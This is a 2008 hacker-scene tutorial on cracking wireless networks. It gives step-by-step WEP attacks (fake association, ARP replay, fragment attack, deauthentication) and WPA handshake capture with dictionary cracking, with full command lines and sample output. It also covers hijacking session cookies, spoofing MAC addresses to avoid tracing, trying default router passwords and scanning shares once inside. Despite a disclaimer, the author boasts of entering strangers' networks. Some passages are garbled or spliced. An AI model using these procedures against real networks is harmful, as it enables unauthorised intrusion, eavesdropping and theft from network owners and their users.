-by- lo __t ll xT. or rr pay AA AA__pay ll yy yy o__nn______,, oNXX rrr r_e. .e vv vv e. .e ll__yy yy nnnn n tT rr phon3__v v phon3 ll y___y nn n tT rr e. v.v e. ll y y nn n ___Tt rr. ee. A ee.__.dll yy nn n__.. y tty_.. #$@GnuCon///....................//.............../...../...//////// /* disclaimer: i will not be held responsable for your actions. = . the information within this document is para knowledge. = . anything that was illegal in any other document probably = . still is. Audit your OWN phone systems only. = . Here it is, completely from memory: = */...................................................//..///...//// DOes WPA mean "wireless Pennsylvania?"___ / \ / \|__|\_ _____/ __ __ \ \/\/ /| | | __) | | \ \ / | | | \ | | / \__/\ / |__| \___ / |____/ \/ \/ Summer 2008 *we* rule the city. CHAPTERS: i. Preface Talk about why you should/shouldn't read this. ii. Useful Terminology/Lingo/Acronyms Some things to know before getting started. 0. Useful Wireless programs Applications and tools implemented. 1. Wireless commands - configuration configure your wlan card. 2. WEP breaking through a bad security decision. 3. WPA Breaking through with a dictionary. 4. Extra Security Tools to get familar With and HINTz! Extra things to use when in the WLAN, etc. 5. Video Tutorials Links to video's. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ i. Preface ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ There's so much activity in cities. There's so much traffic in the air. There's so much information that it becomes impossible to resist the temptation. Fifty percent of all the WAPs I have come across have either NO encryption, or WEP (weak) encryption. Ninety percent of those networks are being controlled by a router that still possesses it's default password! %50 of the %50 i can access have filled shared directories. Only %10 of which are password protected. "Windows is everywhere. Windows is weak. Networks are even weaker. Networks are the rocks that put holes in windows." The faster you get into the hobby, the better you are at staying on top when things change. Things will be changing soon. WEP will be replaced with WPA and WPA2. WPA is still brute force, meaning you need a dictionary file that already has the key in it to hash against the cap file. One day that will change, like everything else that has already changed. The SD Card mod for the WRT54G would one day make it to the market and modded yet again by consumers to act as stand alone wardrivers. Fon routers can open locked networks and bridge the connection to a VAP in station mode without encryption. Wireless hacking possibilities are seemingly endless. I have picked up on a higher concentrated amount of networking skills and Linux skills in the last 2 years from hacking at 802.11 than I have in the last 5 years of using Linux alone. It's addictive, vindictive, and at times, it can be used as a substitute tool to gather the feeling you get from being around real friends. It's a playground if you've got the right attitude and tools. Visualize the WLAN or BSS in your head, make a small map. This helps you get a feel for things. You can use nmap to check the OS's of the machines, Airodump to see the link quality, etc. Do what you can to picture it physically. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ii. Useful Terminology/Lingo/Acronyms ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ WPA = Wi-Fi Protected Access Wi-Fi Protected Access (WPA and WPA2) is a class of systems to secure wireless (Wi-Fi) computer networks. WAP = wireless Access point Router or AP with wireless capabilities. WLAN = the actual network under the WAP. (all the wireless devices) Wireless Local Area Network ARP = Address Resolution Protocol what the router uses to associate IPs with MACs. And is sometimes stored byt the DHCP server, to give the MAC the same IP over and over. Very helpful when you are running servers like sshd and Apache. ESSID = Extended Service Set Identifier name of the router and *IS* case sensitive. BSSID = Basic Service Set Identifier The MAC address of the WAP, running under infrastructure mode. BSS = Basic Service Set The basic service set (BSS) is the basic building block of an IEEE 802.11 wireless LAN. The AP controls the Stations - these are all elements of the BSS. MAC = Media Access Controller HEX based address for Network Devices. xx:xx:xx:xx:xx:xx IV = Initialization Vector First 24 bits of a WEP encrypted packet. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 0. Useful Wireless programs ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Wifizoo= You don't have to be authenticated to a router to do this, the only caveat is that you can't do it on encrypted networks. (im sure that will change in the future) cd into the wifizoo directory and run it then open up firefox and go to http://127.0.0.1:8000 --if you get a cookie, set them by clicking on them and then change the options in the preferences of firefox to use the proxy started by wifizoo that proxy is 127.0.0.1:8080 and set it for all protocols.. Tools->Options->Advanced->Network->Settings-> check manual Proxy configuration, In the text box type out 127.0.0.1:8080 and check "use for all protocols" done. Then go to the site the cookie was from and hopefully win access. http://community.corest.com/~hochoa/wifizoo/index.html Aircrack Suite= contains aireplay-ng, airodump-ng, airdecap-ng, aircrack-ng, airmon-ng, packetforge-ng, etc. and is a super powerful tool for the intrusion of an encrypted network. WEP is fading out so, take haste. Also, there's more attack methods that those listed in these tutorials. such as the chop chop fragment method, etc. If you issue a "aireplay --help" or a "aireplay LOL HI" you will get a help screen with little explanations of the seperate -0 through -9. Hands on experience is the best way to go. http://aircrack-ng.org/doku.php http://aircrack-ng.org/doku.php?id=tutorial&DokuWiki=60fe2648f7adf43b601327e50e76a9c8 Cowpatty= Used to crack WPA and now WPA2. Creates hashes from a text based dictionary file and matches them to the hashes caught from airodump in a WPA/WPA2 4 way handshake. http://wirelessdefence.org/Contents/coWPAttyMain.htm Wifitap= Tap someones connection to a wireless AP without Authenticating with the router! very cool thing, uses the atheros chipsets though and VAPs. http://wirelessdefence.org/Contents/WirelessLinuxTools.htm Kismet= Simple air-traffic monitor for Linux. The link below will give you your sources for the Kismet.conf file. http://www.kismetwireless.net/documentation.shtml Aircrack-ptw= Uses a brilliant algorythm for cracking WEP. MUCH faster than aircrack-ng. http://wirelessdefence.org/Contents/Aircrack-ptw.htm (the real link is dead now :( asleap= is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords. http://wirelessdefence.org/Contents/AsleapMain.htm Wesside-ng= A hilarious waste of time. I mean it's cool if you are breaking 40 bit, but, not 128. It does everything for you, even finds a victim. Super Beta as of now, and has TONS of bugs, and needs a chipset blessed by heaven. - stay away from it you won't learn anything from using it and you need to be in close proximity of the router. Wireshark - beautiful packet sniffer, the best, period. "Go Deep." http://www.wireshark.org/ dmesg= shows *all* messages produced by the activities of the wlan cardbus. (man dmesg) THChydra= Used with a text file to try to get access to networked services, Used when you come across an SMB share that has a "$" like "C$" that means it's password protected. http://freeworld.thc.org/thc-hydra/ sucrack= Used to escalate privleges on a *nix machine. http://www.leidecker.info/ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1. Wireless commands - configuration ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ iwconfig - specify channel AP BSSID, AP ESSID, rate, key (WEP), mode (monitor, managed, etc) ifconfig - turning on the device, or bringing it up. dhclient - gets IP from the AP. macchanger - changes MAC or your internal card on a software based protocol. cardctrl - PCMCIA controller. airmon-ng - starts monitor mode, comes with aircrack. route- or "route add default gw" when using fixed non DHCP IP. route will also return the IP of the router usually if you already ran dhclient successfully. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 2. WEP ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ WEP. WEP stands for Wireless (W)ired (E)quivalent (P)rivacy, and is basic wireless ecryption used by wifi devices such as routers,wlan cards, etc.. the way it works is this: All WEP packets are encrypted seperately with an RC4 cypher stream generated by an encryption key. That key is then made up of a 24 bit initialization vector or IV and either a 40 or 104 bit WEP key set by your router config -uration. combined these (the IV and the WEP key) are now 64, or 128 bits. An initialization vector or IV for a 64bit (40 bit actually) is 24bit. So when we say 64bit WEP key, we mean 40bit with a 24bit IV. Same goes for 128 bit WEP key; (104 bit actually) The IV is the same Bit length 24. The IV is the weakest link in the packet, for it is in plaintext! so you as the pentester can already see part of the key (using ethereal or another sniffing promiscuous tactic) generated by your router! whoa. Now, because the IV is only as we mentioned before 24 bits in length theres only 24^5.23 different RC4 encryption streams for every key. These weak IV's give away too much information about the KEY. The mathematical operation that generates these little guys is called a "bitwise exclusive OR" or exclusive OR (XOR), represented as a '^'. and it compares each bit of its first operand to the corresponding bit of the second operand. heres a nice example in Binary form: If both bits are 1's or both bits are 0's, the corresponding bit of the result is set to 0. Otherwise, this operator sets the corresponding result bit to 1. so say bit pattern of our first example is X 0000000000101100 our second is: Y 0000000000010110 our bit pattern of X^Y = Z Z 0000000001110010 easy XD! There it is. If you understand this you are 5 steps further than the average 'script kiddie.' now, say you want to know just why the devices are encrypted? think about it, who cares if you are using their internet? if they have a wireless router, then they are sharing something inbetween them, maybe a Samba shared NFS folder of cool stuff, that they dont want you to see? who knows. Here's how Trevelyn visualizes the packets with his little mind: +========+======+=======+=========+==========+======+ | 802.11 | IV | LLC | SNAP | Payload | ICV | | Header | | | | | | +========+======+=======+=========+==========+======+ \______________/ \_________________________________/ V V non encrypted WEP encrypted Setup --------------- Firstly, we will need a WLAN card that is workable with Linux, and hopefully the drivers support injection. USB cards are great for those who use Apple hardware, and PCMCIA cards are great for Prism2 chipsets and cheap. Need a Linux Live CD or Linux installed and the security tools mentioned. BackTrack 3, comes with most of these tools. If you have Ubuntu you will need to install Aircrack-ptw and the Aircrack suite, along with libpcap-dev. ============================================================================ Let's Use The USB Ralink chipset Linksys WUSB54GC card in our examples: root@slax~#airmon-ng start rausb0 && root@slax~#ifconfig rausb0 up this will set your card to monitor mode and get it up to go. /*please note that ifconfig = ifconfig -a, on most BSD systems so when listing the devices don't be fooled into thinking it is already up. */ if you get any errors i suggest: root@slax~#startx then go to start->backtrack->wireless-tools->kismet if it's not exactly in that folder just find it i am doing this from memory. but the GUI version of Kismet configs your card automatically. :) Once you have found your target you will need to set the card back down and up. Then use airmon-ng to set the channel #. Set it to the same channel the WAP is using. You could use iwconfig for that too, but run the airmon-ng script to be safe. root@slax~#airmon-ng start rausb0 once you got this all going: root@slax~#airodump rausb0 --write tocrack --channel <#> --bssid (optional) the channelofAP can be found using kismet or Airodump-ng (access point/router) tocrack = dumpfiles prefix (it makes a two *.txt *.out) when writing the output will be a .cap file and a .txt, the .cap file you use with aircrack-ptw. rausb0 = device. this should tell you a lot of things and looks like this: ========================================================================== CH 1 ][ BAT 0% ][ GPS 0.000 0.000 0.000 0.00 ][ 2006-04-07 03:19 BSSID PWR Beacons # Data CH MB ENC ESSID 00:40:96:A0:D5:56 5 44 2 1 11. WEP h0h0sAgreement 00:A0:F8:B0:90:13 10 45 7 1 11 WPA BSSID STATION PWR Packets Probes 00:40:96:A0:D5:56 00:0A:41:EE:AD:77 13 2 00:40:96:A0:D5:56 00:0A:F4:4A:1C:A9 14 1 00:A0:F8:B0:90:13 00:A0:F8:63:4F:5A -1 2 ========================================================================== 1st, see our target? 00:40:96:a0:d5:56 = h0h0sAgreement thats mine, and also you can see the channel # (1) and the clients using it, theres 2 clients listed under "STATION" with the same "BSSID" as h0h0sAg- reement see them? ========================================================================== BSSID STATION PWR Packets Probes 00:40:96:A0:D5:56 00:0A:41:EE:AD:77 13 2 00:40:96:A0:D5:56 00:0A:F4:4A:1C:A9 14 1 ========================================================================== NOTE: after a good while and you start to get more and more experienced with this and MAC address schemes, you will soon detect weird patterns in MAC addresses, as if they were allocated to different vendors. This sucks, think about it. If you were to break into a WLAN and use their inet for something like nikto fbi.gov - They can see your MAC address which is hardcoded into the card. So, Here's a concept that I thought of one day: Image a version of Airodump-ng that greps for a MAC address. Then drive around in a vehicle in search for that particular MAC. It shouldn't be too hard to find it, simply search the surrounding neighborhoods around the AP that was hacked. ---- i will act like one of those stations by doing the following: (open a second terminal) root@slax~#aireplay -1 0 -e h0h0sAgreement -a 00:40:96:A0:D5:56 -h 00:0A:41:EE:AD:77 rausb0 -1 = fake association/authentication -e = essid (name of AP (access point)) -a = bssid then after associating you type: root@slax~#aireplay -3 -e h0h0sAgreement -b 00:40:96:a0:d5:56 -h 00:0a:41:ee:ad:77 rausb0 -3 = ARP request replayer -b = bssid (don't forget that it's not (a) this time!!) -h = client i just spoofed as and associated with NOTE: if you spoof your MAC you want to actually change it, with macchanger. If you try to attack without changing the MAC aireplay now complains. what this last command does is, finishes what the first command started. the first command will invoke a "whohas" request from the AP called an ARP request or address resolution protocol address (formal) This first process can sometimes require you to authenticate/associate several times depending on the routers configuration. If the client decides to stop using the network halfway through the process you are sometimes out of luck until it comes back up, There is another way around that, and i will cover this later in my paper. Sometimes you will have to really wait it out for an ARP to come your way. I have seen routers not send them at all at times, others seem to send them all over the place like mad - meaning you can just choose anything for the destination BSSID and you get an ARP for it. The easiest way to get one is to keep deauthing a wireless client or "STATION" as airodump-ng calls them. If an ethernet cable gets tripped you can cause the router to ARP that way too. second command says this: ======================================================================== Read 1 packets (got 0 ARP requests), sent 0 packets... ======================================================================== once the AP sends out the whohas, your card will catch it and replay it. it replays it and catches it as fast as you specify( -x #) = pps. the ARP request is a weakly encrypted packet (ivs) and this will replay either until you get what you want, or the client disconnects :( if the client disconnects it will tell you that it did. and "what you want" = how much ivs you think you'll need. OLD: Aircrack-ng 100-125k iv's has broken 40 bit WEP 330-500k iv's has broken 104 bit WEP 256k has not been tested by the Weak-Net labs as of yet. NEW: Aircrack-ptw 7~9k iv's has broken 40 bit WEP 40~90k iv's has broken 104 bit WEP 256k has not been tested by the Weak-Net labs as of yet. if you come across a router that gives you back only 1~3 ARPs and then stops then you could try to send "Keep Alive" packets like so: root@slax~#aireplay -1 6000 -a -e -h -q 10 -o 1 rausb0 this will require it's own terminal cos, it Auth's and Ass's then sends "keep alive" packets every 10 seconds. ======================================================================== Read 1543 packets (got 523 ARP requests), sent 654 packets... ======================================================================== Errors: ------------------- so far if you got any errors i can specify a few corrections here as a quick reference FAQ: 1. iwconfig does not list your card. if iwconfig does not list your card it is not the right chipset, or that you need to install the right drivers for it. 2. airodump says "network is down.." Here is teh full syntax for bringing the "network" up: root@slax~#airmon-ng start rausb0 root@slax~#ifconfig rausb0 up root@slax~#airodump rausb0 --write tocrack --channel there it is. do it. 3. aireplay -3 -e -a -h -x 1000 says you must specify a BSSID (-b): Thats because you did'nt switch the -a to a -b. 4. any other errors should give you specifics, <._8\ 0x0060: 4e67 a051 53c4 a42c f06d Ng.QS..,.m Use this packet ? ========================================================================= and you can specify which packet to replay, but here are some rules: Caveats: 1. replay ONLY packets with your AP's MAC adress attached to them 2. DISREGARD any packet with a dest. (destination) of ff:ff:ff:ff:ff:ff if done right your airodump terminal should show ivs, acting up. if not, then just Ctl+C the aireplay and try again, until they do. :) Attack Method 3 -------------------- Look for a third way, we can simply search for a station using the AP and find it's MAC. The start Aireplay with the -3 flag, like so: bt:~#aireplay -3 -b -e -h rausb0 then send fake deauth packets at the station using the AP. What this does is forces the station to reconnect to the AP, thus causing an ARP request. Then the window running aireplay with the "-3" argument will catch the ARP and replay it. Attack Method 4 (fragment attack) -------------------- airmon-ng start associate and authenticate with the router. aireplay -5 -a -h -e accept the packets until you are successful and build an packet with the keystream like so: packetforge-ng -0 -a -h -k 255.255.255.255 -l 255.255.255.255 -y fragment -w arp-request use airodump-ng on the channel of the AP and the --ivs output -w cap then aireplay the file with the "-2" argument: aireplay-ng -2 -r arp-request try the packets you find until it raises the "Data#" rapidly in Airodump-ng screen. use aircrack-ptw, done. After the Fact ---------------------- You have enough IV's (hopefully if you are reading this far) now open an even newer, fresher terminal, and cd into the dir of the airodump dumpfile: root@slax~#cd /WEP/trash/house/ now type: root@slax~/WEP/trash/house/#aircrack-ptw it should then ask you for a BSSID to crack (sometimes it catches a few extras) if your airodump session was stopped for any reason you can run it be reinstated, like so. you need to specify a new name, or it might overwrite the previous tocrack.ivs file which we don't want to do. type root@slax~#mergecap -w output.cap if not mergecap -h gives you perfect instructions :-P ONCE KEY IS OBTAINED -------------------------- you now have enough information to attach your little laptop to the big bustling network! type root@slax~#ifconfig rausb0 down && PCMCIA: root@slax~#cardctl eject This will turn off your (wlan0) prism2 card, and software eject it. take the card out, (it's warm isn't it?) and stick in your Atheros based card. wait until one light becomes solid. if one is blinking then the card didnt init, pull it out and try again.::netgearWG511t:: also you can just check iwconfig. type root@slax~#iwconfig rausb0 essid key xx:xx:xx:xx:xx:xx:xx:xx channel && root@slax~#ifconfig rausb0 up && root@slax~#dhcpcd rausb0 (or use dhclient) done. you are attached and up. pat yourself (gently with nothing in your hand) on the back. Errors --------------- up to *this* point we can specify more FAQ errors: 1. your aircrack has negative votes or the same numbers in the matrix: this usually means you messed up your merging of the mergecap and the output file is corrupted. you wanna save those to files you merged together and try again :P 2. My mate has a PDA that points him in the direction of the AP could anything in linux do this?? -tekk Sure it could you need a GPS device hooked up to your system to do so, and Kismet should give you coordinates! Kismet is a very powerful program and also keep in mind you *are* using linux. the software layer of the computer (OS = Linux in our case) is what utilizes the hardware and in linux you utilize your hardware to it's *fullest* possible output! sometimes you could damage things too, so be careful esp. using programs like nikto or void11_pen/hop. 3. AP does not respond to Authentications/Associations request. Hrmmm, you could try to change your MAC address to that of the STATION you are spoofing as, first stop airodump, and type: root@slax~#ifconfig wlan0 down root@slax~#macchanger wlan0 -m ST:AT:IO:NM:AC:AD dress. (see the hidden msg) :P root@slax~#ifconfig wlan0 up root@slax~#airmon.sh start wlan0 root@slax~#airodump wlan0 tocrack 1 then redo your attack, with aireplay. Also, maybe MAC filtering is enabled! if this is the case you will have to wait till you see a "STATION" in airodump, and deuth it and spoof to that MAC address. (a little more advanced) 4. macchanger hangs my system! if *anything* hangs your system wifi related EJECT THE CARD MANUALLY before turning the system off!! we arent talking about windows here, you'll never have to reboot your machine by holding in the power button! ok, with that out of the way, I, personally, have only gotten a Prism2 chipset bearing card to change the MAC, my Atheros card WG511T hangs instant -ly :( 5. will macchanger hurt my card!? No, macchanger works at the software layer (level) to do this, it's just as risky as a child wereing a mask, it does not touch your firmware. 6. My prism2 card isnt there?!? PCMCIA Support only (OLD shit) well, one thing i have done to get them to show up in iwconfig is switch inbetween drivers: root@slax~#switch-to-wlanng root@slax~#cardctl eject root@slax~#cardctl insert you can try this a few times and can get help by invoking it.. in a bash shell type root@slax~#switch-to then press tab key to see options. 7. how can i find help from each command in specific, there is no man pages! type the command with the (-h) flag, this will invoke help. or --help :) 8. Which live cd's do you recommend? < up - brings device up - theres a lot of things you can do with this great command. 4.iwconfig mode managed - managed AP mode mode monitor channel - monitors passively the traffic on that specific channel 5.ifup, ifdown 6.ping -c 1 google.com - just pings to see if you are up on the netwprk. -c 1 192.168.2.1 - just ping router address (Cisco) 7.airmon.sh start - sets any card into monitor mode for that specific channel, good to use when iwconfig wlan0 mode monitor channel X fails on prism2 devices. 8.dmesg - shows *all* messages produced by the activities of the wlan cardbus. 9.lynx - web browser for your console 10.halt - end session completely = shutdown 11.chmod 744 - makes executable. like say a shell script. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 3. WPA ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ This is from an old file i wrote back when I first did this. So much has changed since then, I tried to go through and edit some, but it's just too out of date. I mean, some flags are different now, and such. I was using Auditor which was combined with WHAX! to make BackTrack a long time ago; now there BackTrack 3! Also, theres a better application for cracking the Key, called CowPatty, Which was just released, modded by the CoWF for WPA2, as 4.0 This hashes everything, and can use pre hashed files. - Learn more here: http://wirelessdefence.org/Contents/coWPAttyMain.htm You would most likely be using that application stead of Aircrack-ng. a few of what you need: * Dictionary file consisting of tons of words each 1 word per line, and should contain words and numbers and a mixture of, (what you think will be necessary, or what you think people would use as passwds) remember to keep the format the same though, each word you ammend to your dictionary file must be on a NEW line. Here's one compiled by the CoWF, and an associated ESSID list to make pre hashes (or rainbow tables): http://www.churchofwifi.org/default.asp?PageLink=Project_Display.asp?PID=87 * PCMCIA/USB card, laptop and Backtrack live cd. (or whatever flavor ye fancy of LiNUX) WUSB54GC is Ralink chipset, and Serial monkey made those drivers for injection here: http://rt2x00.serialmonkey.com/wiki/index.php/Hardware under the rt73 section. ============================================================================== 1st: fire up your favorite; airodump-ng, and open a seperate terminal. put the card into monitor mode with iwconfig and set the channel. if you dont know the channel, again, you must set it generic and scan with airodump. ==SYNTAX root@slax:~#airodump-ng rausb0 --write wpatest --channel OLD (out of date) note: i have seen people switch-to-hostap drivers before the attack but i cannot get that started with my trusty prism2 based card 2nd: then in the seperate terminal run aireplay to deauth one of the stations listed in airodump as using the AP currently. This sends fake Deauthentication packets forged with Aireplay to the victim "STATION" or "client" currently using the AP. Once the victim is Deuathed It will (hopefully) attempt to re-connect to the AP. For a WPA connection to take place between a wireless client and an AP (router) there needs to be a 4 way handshake. This handshake is what Cowpatty uses as its only clue. Cowpatty will encrpyt line by line the wordfile, and match it to data in the handshake, etc. ==SYNTAX root@slax:~#aireplay -0 5 -e -a -c (-0 is Deauth) (5 packets) (-e = name of router) (-a MAC addy of router) etc... 3rd: now that the STATION is hopefully Deauthed, or Disassociated cd into the Directory where you keep your dictionary file, and unzip it for usage. (in BackTrack live cd (beta) this would be /pentest/password/dictionaries/* you can simply pull from this file and make your own like so: ==SYNTAX root@slax:/pentest/password/dictionaries#zcat wordlist.txt.Z | egrep -v '^#' > all this will create a file labeled 'all' with all the words from the 'wordlist.txt.Z' file. now that you have the file 'all' run aircrack on that file like so: ==SYNTAX root@slax:/pentest/password/dictionaries#aircrack-ng -a 2 -w all wpatest-01.cap this will then ask you which bssid you want to try. note: you should have a handshake in the file, if not you cannot proceed. sometimes this could seriously take a while to get as well, but since you are using your own network (i hope, ;p) you could just reset a clients connection for testing purposes. NEW note: Use Cowpatty! ==SYNTAX root@slax:/WEP/MALL# aircrack-ng -a 2 -w /pentest/password/dictionaries/all wpatest-01.cap Opening wpatest-01.cap Read 79102 packets. # BSSID ESSID Encryption 1 00:06:25:61:30:C0 h0h0sAgreement WEP (163 IVs) 2 00:A0:F8:AD:26:C1 WPA (1 handshake) 3 00:A0:F8:EB:06:34 JethroTull WPA (0 handshake) 4 00:A0:F8:EB:06:35 Cisco SUX WPA (1 handshake) 5 00:00:C5:FE:62:3C Belkin54g WEP (91 IVs) 6 00:14:A8:A0:B3:A0 No data - WEP or WPA 7 00:A0:F8:EB:06:29 trevelyn WPA (0 handshake) 8 00:A0:F8:EB:06:28 linksystem WPA (0 handshake) 9 00:12:17:7A:F1:05 linksys None (0.0.0.0) Index number of target network ? enter the dragon and cross your fingers. :-P ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 4. Extra Security Tools to get familar With and HINTz! ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Ettercap= Will search for Clients on a wired, wireless, or mixed network. Ethereal-wireshark= Packet Sniffer. Dsniff= Used for MITM or man in the middle attacks, should be used with: Webmitm, dnsspoof, arpspoof, fragrouter, and wireshark. nmap= Find open ports to exploit with Metasploit. Metasploit= Skiddy way to get into computers and spawn shells and such. ngrep= sniff sniff. nikto= blast httpd servers running anywhere with a preconfigured pentester. pretty scary and should only be run from other peoples WAN IPs ;-) smbtree -N= search for shares, you can use the GUI to do so graphically, by opening nautilus or firefox and going to "smb:///" smbmount //workgroup/computername/shareddocs/ /mnt/netwprk ============================================================================ sites to bookmark= http://www.cirt.net/cgi-bin/passwd.pl for when you get in, you MUST try the default passwords against the routers. usually the router is at x.x.x.1, like 192.168.1.1, 192.168.0.1, 10.10.10.1, or 123.123.123.1 etc. %90 of the routers I have been in havent been changed! http://zombie.el.cx/texts/hacking/pdfs/ some files... ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 5. Video Tutorials ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Videos help out a lot when learning a new piece of software. Just look at how sucessful Camtasia Studo is. There's videos everywhere, but you want to watch some that are informational along with the videos that are entertaining. Video's with narration, such as those found at irongeek, are very informative. Where as some that simply play music and have few captions are also informative but only to people with a little more experience, especially with the Linux OS. http://www.irongeek.com/ http://www.milw0rm.com/ http://www.offensive-security.com/ http://zombie.el.cx/images/saving-mp3.html there's a whole lot more, homemade videos can be found in the remot-exploit forums i bet of people who have made them. Just do a google search.